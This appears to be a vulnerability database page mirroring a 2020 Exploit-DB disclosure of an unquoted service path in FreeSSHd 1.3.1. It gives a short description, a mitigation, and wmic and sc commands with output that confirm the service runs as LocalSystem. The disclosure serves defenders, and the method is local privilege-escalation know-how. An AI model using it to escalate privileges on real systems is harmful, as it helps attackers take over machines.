header-logo
Suggest Exploit
vendor:
FreeSSHd
by:
boku
7.2
CVSS
HIGH
Unquoted Service Path
73
CWE
Product Name: FreeSSHd
Affected Version From: 1.3.1
Affected Version To: 1.3.1
Patch Exists: NO
Related CWE: N/A
CPE: a:freesshd:freesshd:1.3.1
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 (32-bit)
2020

FreeSSHd 1.3.1 – ‘FreeSSHDService’ Unquoted Service Path

A vulnerability exists in FreeSSHd 1.3.1 where the 'FreeSSHDService' service path is not quoted, allowing an attacker to gain elevated privileges on the system. This can be exploited by a local attacker to gain SYSTEM privileges.

Mitigation:

Ensure that all service paths are quoted to prevent attackers from exploiting this vulnerability.
Source

Exploit-DB raw data:

Exploit Title: FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path
Exploit Author: boku
Date: 2020-02-10
Vendor Homepage: http://www.freesshd.com 
Software Link: http://www.freesshd.com/freeSSHd.exe
Version: 1.3.1
Tested On: Windows 10 (32-bit)

C:\Users\nightelf>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i "freesshd" | findstr /i /v """
FreeSSHDService                           C:\Program Files\freeSSHd\FreeSSHDService.exe                                      Auto

C:\Users\nightelf>sc qc FreeSSHDService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: FreeSSHDService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\freeSSHd\FreeSSHDService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : FreeSSHDService
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : LocalSystem